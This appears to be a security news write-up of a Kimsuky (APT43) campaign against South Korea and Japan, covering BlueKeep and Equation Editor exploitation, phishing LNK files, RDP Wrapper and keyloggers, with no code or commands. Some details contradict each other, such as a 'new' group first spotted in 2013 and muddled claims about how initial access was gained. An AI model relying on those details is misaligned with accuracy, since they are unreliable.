Kimsuky APT Exploited BlueKeep RDP Flaw in Attacks Against South Korea and Japan
A new North Korea-linked group, Kimsuky, has been spotted exploiting a patched Microsoft Remote Desktop Services (RDS) flaw to gain initial access to systems in South Korea and Japan. Researchers at the AhnLab SEcurity intelligence Center (ASEC) discovered this campaign, tracked as Larva-24005, while investigating a security breach.
The attackers exploited the BlueKeep vulnerability (CVE-2019-0708), which was patched by Microsoft in May 2019. Despite this, Kimsuky's campaign demonstrated how sophisticated and persistent North Korean-sponsored hackers can be.
Initial Access and Malware Deployment
In some systems, initial access was gained through exploiting the RDP vulnerability. However, an RDP vulnerability scanner was found in the compromised system, suggesting that it may not have been used by the attackers. Once inside, the threat actors used other means to distribute malware, such as attaching a file to emails and exploiting the Microsoft Office Equation Editor vulnerability (CVE-2017-11882).
Upon gaining access, Kimsuky modified the configuration of infected systems by installing MySpy malware and RDPWrap to maintain remote access. In the final stage, the attackers deployed KimaLogger or RandomQuery keyloggers to record keystrokes.
Spear-Phishing Attacks and ForceCopy Stealer Malware
Kimsuky's campaign also involved spear-phishing attacks aimed at organizations in South Korea and Japan. The attackers sent phishing emails with malicious *.LNK shortcut files disguised as Office documents. When opened, these files executed PowerShell or Mshta to download malware like PebbleDash and RDP Wrapper.
The Kimsuky group uses a custom-built RDP Wrapper to enable remote desktop access, likely modifying export functions to evade detection. They also install proxy malware to achieve external access to infected systems located in private networks.
Keyloggers and File Exfiltration
Kimsuky's malware suite includes keyloggers available in multiple file formats, including a PowerShell script. The attackers used the forceCopy stealer malware to capture keystrokes and extract files from browser directories.
Ancillary Information
This campaign is part of Kimsuky's broader activities, which have targeted organizations in South Korea, the U.S., China, Japan, Germany, Singapore, and several other countries since September 2023. Their activity includes phishing campaigns against South Korea and Japan, as well as attacks on South Korea's software, energy, and financial sectors starting in October 2023.
Ahnlab SE researchers have published indicators of compromise (IoC) for this campaign. Kimsuky cyberespionage group, also known as APT43 or ARCHIPELAGO, was first spotted by Kaspersky researchers in 2013. The group operates under the control of the Reconnaissance General Bureau (RGB) foreign intelligence service.
Conclusion
This incident highlights the persistence and sophistication of North Korea-sponsored hackers. As security professionals, it is essential to stay vigilant and monitor for signs of such attacks. By understanding the tactics, techniques, and procedures (TTPs) of groups like Kimsuky, we can better prepare ourselves against their methods.